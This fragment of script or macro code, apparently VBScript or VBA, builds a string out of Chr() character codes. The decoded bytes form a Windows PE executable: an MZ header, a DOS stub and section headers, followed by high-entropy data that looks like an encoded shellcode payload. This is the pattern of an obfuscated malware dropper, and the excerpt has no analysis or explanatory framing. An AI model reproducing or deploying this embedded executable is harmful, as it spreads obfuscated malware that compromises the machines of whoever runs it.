		wvWPLP=Chr(77)&Chr(90)&Chr(144)&Chr(0)&Chr(3)&Chr(0)&Chr(0)&Chr(0)&Chr(4)&Chr(0)&Chr(0)&Chr(0)&Chr(255)&Chr(255)&Chr(0)&Chr(0)&Chr(184)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(64)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(128)&Chr(0)&Chr(0)&Chr(0)&Chr(14)&Chr(31)&Chr(186)&Chr(14)&Chr(0)&Chr(180)&Chr(9)&Chr(205)&Chr(33)&Chr(184)&Chr(1)&Chr(76)&Chr(205)&Chr(33)&Chr(84)&Chr(104)&Chr(105)&Chr(115)&Chr(32)&Chr(112)&Chr(114)&Chr(111)&Chr(103)&Chr(114)&Chr(97)&Chr(109)&Chr(32)&Chr(99)&Chr(97)&Chr(110)&Chr(110)&Chr(111)&Chr(116)&Chr(32)&Chr(98)&Chr(101)
wvWPLP=wvWPLP&Chr(32)&Chr(114)&Chr(117)&Chr(110)&Chr(32)&Chr(105)&Chr(110)&Chr(32)&Chr(68)&Chr(79)&Chr(83)&Chr(32)&Chr(109)&Chr(111)&Chr(100)&Chr(101)&Chr(46)&Chr(13)&Chr(13)&Chr(10)&Chr(36)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(80)&Chr(69)&Chr(0)&Chr(0)&Chr(76)&Chr(1)&Chr(3)&Chr(0)&Chr(97)&Chr(144)&Chr(140)&Chr(129)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(224)&Chr(0)&Chr(15)&Chr(3)&Chr(11)&Chr(1)&Chr(2)&Chr(56)&Chr(0)&Chr(2)&Chr(0)&Chr(0)&Chr(0)&Chr(14)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(16)&Chr(0)&Chr(0)&Chr(0)&Chr(16)&Chr(0)&Chr(0)&Chr(0)&Chr(32)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(64)&Chr(0)&Chr(0)&Chr(16)&Chr(0)&Chr(0)&Chr(0)&Chr(2)&Chr(0)&Chr(0)&Chr(4)&Chr(0)&Chr(0)&Chr(0)&Chr(1)&Chr(0)&Chr(0)&Chr(0)
wvWPLP=wvWPLP&Chr(4)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(64)&Chr(0)&Chr(0)&Chr(0)&Chr(2)&Chr(0)&Chr(0)&Chr(70)&Chr(58)&Chr(0)&Chr(0)&Chr(2)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(32)&Chr(0)&Chr(0)&Chr(16)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(16)&Chr(0)&Chr(0)&Chr(16)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(16)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(48)&Chr(0)&Chr(0)&Chr(100)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)
wvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(46)&Chr(116)&Chr(101)&Chr(120)&Chr(116)&Chr(0)&Chr(0)&Chr(0)&Chr(40)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(16)&Chr(0)&Chr(0)&Chr(0)&Chr(2)&Chr(0)&Chr(0)&Chr(0)&Chr(2)&Chr(0)&Chr(0)
wvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(32)&Chr(0)&Chr(48)&Chr(96)&Chr(46)&Chr(100)&Chr(97)&Chr(116)&Chr(97)&Chr(0)&Chr(0)&Chr(0)&Chr(144)&Chr(10)&Chr(0)&Chr(0)&Chr(0)&Chr(32)&Chr(0)&Chr(0)&Chr(0)&Chr(12)&Chr(0)&Chr(0)&Chr(0)&Chr(4)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(32)&Chr(0)&Chr(48)&Chr(224)&Chr(46)&Chr(105)&Chr(100)&Chr(97)&Chr(116)&Chr(97)&Chr(0)&Chr(0)&Chr(100)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(48)&Chr(0)&Chr(0)&Chr(0)&Chr(2)&Chr(0)&Chr(0)&Chr(0)&Chr(16)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(64)&Chr(0)&Chr(48)&Chr(192)&Chr(0)&Chr(0)&Chr(0)&Chr(0)
wvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(184)&Chr(0)&Chr(32)&Chr(64)&Chr(0)&Chr(255)&Chr(224)&Chr(144)&Chr(255)&Chr(37)&Chr(56)&Chr(48)&Chr(64)&Chr(0)&Chr(144)&Chr(144)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(255)&Chr(255)&Chr(255)&Chr(255)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(255)&Chr(255)&Chr(255)&Chr(255)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)
wvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)
wvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)
wvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)
wvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)
wvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(190)&Chr(101)&Chr(81)&Chr(244)&Chr(228)&Chr(221)&Chr(199)&Chr(217)&Chr(116)&Chr(36)&Chr(244)&Chr(95)&Chr(49)&Chr(201)&Chr(102)&Chr(185)&Chr(4)&Chr(2)&Chr(49)&Chr(119)&Chr(21)&Chr(3)&Chr(119)&Chr(21)&Chr(131)&Chr(199)&Chr(97)&Chr(179)&Chr(1)&Chr(213)&Chr(169)&Chr(91)&Chr(226)&Chr(6)&Chr(105)&Chr(156)&Chr(150)&Chr(217)&Chr(89)&Chr(248)&Chr(223)&Chr(6)&Chr(101)&Chr(232)&Chr(98)&Chr(70)&Chr(149)&Chr(233)&Chr(2)&Chr(206)&Chr(112)&Chr(216)&Chr(2)&Chr(180)&Chr(241)&Chr(75)&Chr(179)&Chr(190)&Chr(87)&Chr(96)&Chr(56)&Chr(146)&Chr(67)&Chr(243)&Chr(76)&Chr(59)&Chr(100)&Chr(180)&Chr(251)&Chr(29)&Chr(75)&Chr(69)&Chr(87)&Chr(93)&Chr(202)&Chr(197)
wvWPLP=wvWPLP&Chr(170)&Chr(178)&Chr(44)&Chr(247)&Chr(100)&Chr(199)&Chr(45)&Chr(48)&Chr(152)&Chr(42)&Chr(127)&Chr(233)&Chr(214)&Chr(153)&Chr(111)&Chr(158)&Chr(163)&Chr(33)&Chr(4)&Chr(236)&Chr(34)&Chr(34)&Chr(249)&Chr(165)&Chr(69)&Chr(3)&Chr(172)&Chr(190)&Chr(31)&Chr(131)&Chr(79)&Chr(18)&Chr(20)&Chr(138)&Chr(87)&Chr(119)&Chr(17)&Chr(68)&Chr(236)&Chr(67)&Chr(237)&Chr(87)&Chr(36)&Chr(154)&Chr(14)&Chr(251)&Chr(9)&Chr(18)&Chr(253)&Chr(5)&Chr(78)&Chr(149)&Chr(30)&Chr(112)&Chr(166)&Chr(229)&Chr(163)&Chr(131)&Chr(125)&Chr(151)&Chr(127)&Chr(1)&Chr(101)&Chr(63)&Chr(11)&Chr(177)&Chr(65)&Chr(193)&Chr(216)&Chr(36)&Chr(2)&Chr(205)&Chr(149)&Chr(35)&Chr(76)&Chr(210)&Chr(40)&Chr(231)&Chr(231)&Chr(238)&Chr(161)&Chr(6)&Chr(39)&Chr(103)&Chr(241)&Chr(44)&Chr(227)&Chr(35)&Chr(161)&Chr(77)&Chr(178)&Chr(137)&Chr(4)&Chr(113)&Chr(164)&Chr(113)&Chr(248)&Chr(215)&Chr(175)&Chr(156)
wvWPLP=wvWPLP&Chr(237)&Chr(101)&Chr(242)&Chr(200)&Chr(194)&Chr(71)&Chr(12)&Chr(9)&Chr(77)&Chr(223)&Chr(127)&Chr(59)&Chr(210)&Chr(75)&Chr(23)&Chr(119)&Chr(155)&Chr(85)&Chr(224)&Chr(14)&Chr(139)&Chr(101)&Chr(62)&Chr(168)&Chr(220)&Chr(155)&Chr(190)&Chr(201)&Chr(245)&Chr(95)&Chr(234)&Chr(153)&Chr(109)&Chr(73)&Chr(146)&Chr(113)&Chr(110)&Chr(118)&Chr(71)&Chr(239)&Chr(100)&Chr(224)&Chr(167)&Chr(88)&Chr(83)&Chr(2)&Chr(79)&Chr(155)&Chr(164)&Chr(243)&Chr(211)&Chr(18)&Chr(66)&Chr(163)&Chr(187)&Chr(116)&Chr(219)&Chr(4)&Chr(107)&Chr(53)&Chr(139)&Chr(236)&Chr(97)&Chr(186)&Chr(244)&Chr(13)&Chr(138)&Chr(16)&Chr(157)&Chr(164)&Chr(100)&Chr(205)&Chr(245)&Chr(80)&Chr(29)&Chr(84)&Chr(141)&Chr(193)&Chr(226)&Chr(66)&Chr(235)&Chr(194)&Chr(104)&Chr(103)&Chr(11)&Chr(140)&Chr(152)&Chr(2)&Chr(31)&Chr(249)&Chr(255)&Chr(236)&Chr(223)&Chr(250)&Chr(149)&Chr(236)&Chr(181)&Chr(254)&Chr(63)&Chr(186)
wvWPLP=wvWPLP&Chr(33)&Chr(253)&Chr(102)&Chr(140)&Chr(237)&Chr(254)&Chr(77)&Chr(142)&Chr(234)&Chr(1)&Chr(19)&Chr(167)&Chr(129)&Chr(52)&Chr(129)&Chr(135)&Chr(253)&Chr(56)&Chr(69)&Chr(8)&Chr(254)&Chr(110)&Chr(15)&Chr(8)&Chr(150)&Chr(214)&Chr(107)&Chr(91)&Chr(131)&Chr(24)&Chr(166)&Chr(207)&Chr(24)&Chr(141)&Chr(72)&Chr(166)&Chr(205)&Chr(6)&Chr(32)&Chr(68)&Chr(43)&Chr(96)&Chr(239)&Chr(183)&Chr(30)&Chr(242)&Chr(247)&Chr(72)&Chr(220)&Chr(221)&Chr(95)&Chr(33)&Chr(30)&Chr(94)&Chr(95)&Chr(177)&Chr(116)&Chr(94)&Chr(15)&Chr(217)&Chr(131)&Chr(113)&Chr(160)&Chr(41)&Chr(107)&Chr(88)&Chr(233)&Chr(33)&Chr(230)&Chr(13)&Chr(88)&Chr(211)&Chr(247)&Chr(7)&Chr(60)&Chr(77)&Chr(247)&Chr(164)&Chr(228)&Chr(126)&Chr(130)&Chr(197)&Chr(27)&Chr(127)&Chr(115)&Chr(204)&Chr(120)&Chr(127)&Chr(115)&Chr(240)&Chr(127)&Chr(67)&Chr(165)&Chr(201)&Chr(10)&Chr(130)&Chr(117)&Chr(110)&Chr(4)&Chr(177)
wvWPLP=wvWPLP&Chr(216)&Chr(199)&Chr(142)&Chr(186)&Chr(79)&Chr(23)&Chr(155)&Chr(216)&Chr(243)&Chr(139)&Chr(45)&Chr(122)&Chr(3)&Chr(219)&Chr(41)&Chr(204)&Chr(172)&Chr(252)&Chr(226)&Chr(254)&Chr(31)&Chr(68)&Chr(176)&Chr(171)&Chr(187)&Chr(179)&Chr(7)&Chr(101)&Chr(40)&Chr(19)&Chr(241)&Chr(206)&Chr(233)&Chr(170)&Chr(162)&Chr(130)&Chr(243)&Chr(46)&Chr(241)&Chr(31)&Chr(166)&Chr(227)&Chr(79)&Chr(218)&Chr(155)&Chr(23)&Chr(216)&Chr(77)&Chr(13)&Chr(29)&Chr(233)&Chr(245)&Chr(118)&Chr(75)&Chr(17)&Chr(93)&Chr(97)&Chr(210)&Chr(181)&Chr(130)&Chr(180)&Chr(249)&Chr(123)&Chr(71)&Chr(184)&Chr(118)&Chr(249)&Chr(201)&Chr(231)&Chr(125)&Chr(151)&Chr(72)&Chr(157)&Chr(75)&Chr(41)&Chr(139)&Chr(112)&Chr(44)&Chr(181)&Chr(145)&Chr(197)&Chr(211)&Chr(247)&Chr(1)&Chr(34)&Chr(209)&Chr(67)&Chr(164)&Chr(233)&Chr(33)&Chr(82)&Chr(224)&Chr(101)&Chr(59)&Chr(177)&Chr(181)&Chr(208)&Chr(202)&Chr(205)&Chr(66)
wvWPLP=wvWPLP&Chr(50)&Chr(53)&Chr(181)&Chr(169)&Chr(48)&Chr(229)&Chr(163)&Chr(77)&Chr(164)&Chr(123)&Chr(164)&Chr(64)&Chr(219)&Chr(111)&Chr(224)&Chr(32)&Chr(191)&Chr(171)&Chr(58)&Chr(166)&Chr(181)&Chr(240)&Chr(62)&Chr(98)&Chr(207)&Chr(160)&Chr(94)&Chr(255)&Chr(211)&Chr(200)&Chr(147)&Chr(102)&Chr(104)&Chr(92)&Chr(178)&Chr(210)&Chr(138)&Chr(51)&Chr(3)&Chr(27)&Chr(244)&Chr(110)&Chr(214)&Chr(166)&Chr(52)&Chr(175)&Chr(168)&Chr(115)&Chr(191)&Chr(80)&Chr(54)&Chr(30)&Chr(166)&Chr(127)&Chr(37)&Chr(209)&Chr(112)&Chr(103)&Chr(141)&Chr(204)&Chr(82)&Chr(0)&Chr(255)&Chr(79)&Chr(9)&Chr(26)&Chr(0)&Chr(82)&Chr(121)&Chr(55)&Chr(50)&Chr(25)&Chr(248)&Chr(220)&Chr(8)&Chr(22)&Chr(129)&Chr(147)&Chr(93)&Chr(71)&Chr(146)&Chr(142)&Chr(170)&Chr(107)&Chr(223)&Chr(110)&Chr(86)&Chr(181)&Chr(178)&Chr(48)&Chr(125)&Chr(179)&Chr(63)&Chr(216)&Chr(201)&Chr(72)&Chr(21)&Chr(26)&Chr(172)&Chr(248)
wvWPLP=wvWPLP&Chr(222)&Chr(164)&Chr(1)&Chr(147)&Chr(215)&Chr(120)&Chr(59)&Chr(103)&Chr(95)&Chr(232)&Chr(56)&Chr(138)&Chr(17)&Chr(194)&Chr(223)&Chr(51)&Chr(210)&Chr(21)&Chr(7)&Chr(208)&Chr(167)&Chr(1)&Chr(57)&Chr(43)&Chr(242)&Chr(79)&Chr(15)&Chr(147)&Chr(234)&Chr(19)&Chr(204)&Chr(218)&Chr(162)&Chr(124)&Chr(63)&Chr(69)&Chr(75)&Chr(117)&Chr(183)&Chr(72)&Chr(223)&Chr(103)&Chr(23)&Chr(214)&Chr(162)&Chr(225)&Chr(103)&Chr(115)&Chr(88)&Chr(113)&Chr(17)&Chr(11)&Chr(50)&Chr(234)&Chr(70)&Chr(67)&Chr(50)&Chr(232)&Chr(62)&Chr(18)&Chr(152)&Chr(142)&Chr(197)&Chr(106)&Chr(93)&Chr(50)&Chr(8)&Chr(198)&Chr(225)&Chr(13)&Chr(109)&Chr(252)&Chr(73)&Chr(151)&Chr(153)&Chr(127)&Chr(127)&Chr(69)&Chr(186)&Chr(8)&Chr(232)&Chr(98)&Chr(79)&Chr(63)&Chr(153)&Chr(156)&Chr(143)&Chr(225)&Chr(170)&Chr(254)&Chr(254)&Chr(162)&Chr(235)&Chr(221)&Chr(217)&Chr(142)&Chr(129)&Chr(74)&Chr(46)&Chr(112)
wvWPLP=wvWPLP&Chr(161)&Chr(110)&Chr(25)&Chr(81)&Chr(253)&Chr(154)&Chr(98)&Chr(175)&Chr(106)&Chr(6)&Chr(122)&Chr(40)&Chr(89)&Chr(165)&Chr(26)&Chr(152)&Chr(120)&Chr(243)&Chr(105)&Chr(249)&Chr(170)&Chr(215)&Chr(116)&Chr(161)&Chr(118)&Chr(117)&Chr(6)&Chr(40)&Chr(246)&Chr(190)&Chr(242)&Chr(157)&Chr(39)&Chr(121)&Chr(253)&Chr(100)&Chr(44)&Chr(179)&Chr(60)&Chr(95)&Chr(90)&Chr(248)&Chr(181)&Chr(238)&Chr(24)&Chr(40)&Chr(247)&Chr(134)&Chr(234)&Chr(88)&Chr(195)&Chr(234)&Chr(121)&Chr(31)&Chr(176)&Chr(11)&Chr(68)&Chr(142)&Chr(149)&Chr(93)&Chr(252)&Chr(212)&Chr(86)&Chr(73)&Chr(77)&Chr(38)&Chr(81)&Chr(24)&Chr(68)&Chr(160)&Chr(226)&Chr(19)&Chr(100)&Chr(99)&Chr(10)&Chr(205)&Chr(76)&Chr(86)&Chr(76)&Chr(126)&Chr(228)&Chr(246)&Chr(175)&Chr(107)&Chr(39)&Chr(137)&Chr(254)&Chr(140)&Chr(60)&Chr(29)&Chr(112)&Chr(111)&Chr(118)&Chr(42)&Chr(193)&Chr(68)&Chr(252)&Chr(57)&Chr(191)&Chr(136)
wvWPLP=wvWPLP&Chr(152)&Chr(180)&Chr(239)&Chr(142)&Chr(103)&Chr(225)&Chr(33)&Chr(1)&Chr(25)&Chr(38)&Chr(181)&Chr(87)&Chr(205)&Chr(123)&Chr(154)&Chr(144)&Chr(129)&Chr(14)&Chr(17)&Chr(96)&Chr(7)&Chr(144)&Chr(16)&Chr(226)&Chr(176)&Chr(66)&Chr(242)&Chr(93)&Chr(177)&Chr(220)&Chr(112)&Chr(41)&Chr(24)&Chr(180)&Chr(206)&Chr(91)&Chr(246)&Chr(14)&Chr(217)&Chr(194)&Chr(29)&Chr(151)&Chr(136)&Chr(26)&Chr(169)&Chr(145)&Chr(50)&Chr(224)&Chr(65)&Chr(180)&Chr(73)&Chr(204)&Chr(214)&Chr(230)&Chr(209)&Chr(251)&Chr(96)&Chr(178)&Chr(53)&Chr(232)&Chr(47)&Chr(183)&Chr(179)&Chr(125)&Chr(197)&Chr(58)&Chr(95)&Chr(248)&Chr(85)&Chr(176)&Chr(80)&Chr(113)&Chr(47)&Chr(244)&Chr(10)&Chr(6)&Chr(67)&Chr(191)&Chr(107)&Chr(191)&Chr(234)&Chr(34)&Chr(2)&Chr(12)&Chr(160)&Chr(199)&Chr(50)&Chr(54)&Chr(82)&Chr(54)&Chr(42)&Chr(221)&Chr(38)&Chr(115)&Chr(149)&Chr(5)&Chr(112)&Chr(166)&Chr(233)&Chr(3)
wvWPLP=wvWPLP&Chr(41)&Chr(9)&Chr(252)&Chr(185)&Chr(54)&Chr(244)&Chr(186)&Chr(241)&Chr(126)&Chr(46)&Chr(80)&Chr(4)&Chr(3)&Chr(152)&Chr(49)&Chr(179)&Chr(200)&Chr(104)&Chr(56)&Chr(149)&Chr(125)&Chr(103)&Chr(148)&Chr(9)&Chr(102)&Chr(147)&Chr(227)&Chr(255)&Chr(85)&Chr(57)&Chr(190)&Chr(161)&Chr(99)&Chr(133)&Chr(46)&Chr(208)&Chr(93)&Chr(115)&Chr(78)&Chr(87)&Chr(225)&Chr(132)&Chr(173)&Chr(198)&Chr(89)&Chr(133)&Chr(194)&Chr(113)&Chr(88)&Chr(88)&Chr(228)&Chr(134)&Chr(80)&Chr(176)&Chr(94)&Chr(42)&Chr(142)&Chr(19)&Chr(233)&Chr(98)&Chr(234)&Chr(202)&Chr(56)&Chr(228)&Chr(127)&Chr(5)&Chr(51)&Chr(54)&Chr(72)&Chr(86)&Chr(174)&Chr(61)&Chr(167)&Chr(124)&Chr(66)&Chr(169)&Chr(159)&Chr(195)&Chr(86)&Chr(170)&Chr(227)&Chr(89)&Chr(48)&Chr(20)&Chr(249)&Chr(158)&Chr(20)&Chr(42)&Chr(130)&Chr(159)&Chr(115)&Chr(185)&Chr(223)&Chr(69)&Chr(53)&Chr(252)&Chr(51)&Chr(20)&Chr(47)&Chr(177)
wvWPLP=wvWPLP&Chr(23)&Chr(130)&Chr(38)&Chr(166)&Chr(90)&Chr(126)&Chr(243)&Chr(202)&Chr(243)&Chr(254)&Chr(252)&Chr(195)&Chr(174)&Chr(62)&Chr(109)&Chr(186)&Chr(231)&Chr(115)&Chr(77)&Chr(26)&Chr(253)&Chr(179)&Chr(195)&Chr(54)&Chr(34)&Chr(69)&Chr(40)&Chr(139)&Chr(92)&Chr(68)&Chr(187)&Chr(17)&Chr(121)&Chr(69)&Chr(118)&Chr(194)&Chr(119)&Chr(191)&Chr(97)&Chr(108)&Chr(55)&Chr(30)&Chr(226)&Chr(100)&Chr(52)&Chr(195)&Chr(238)&Chr(55)&Chr(144)&Chr(177)&Chr(222)&Chr(61)&Chr(1)&Chr(209)&Chr(83)&Chr(41)&Chr(93)&Chr(22)&Chr(55)&Chr(24)&Chr(81)&Chr(75)&Chr(127)&Chr(198)&Chr(161)&Chr(15)&Chr(34)&Chr(232)&Chr(188)&Chr(202)&Chr(10)&Chr(194)&Chr(163)&Chr(219)&Chr(51)&Chr(116)&Chr(139)&Chr(228)&Chr(75)&Chr(120)&Chr(99)&Chr(81)&Chr(72)&Chr(177)&Chr(229)&Chr(197)&Chr(79)&Chr(171)&Chr(225)&Chr(253)&Chr(132)&Chr(41)&Chr(235)&Chr(75)&Chr(142)&Chr(80)&Chr(131)&Chr(116)&Chr(244)&Chr(109)
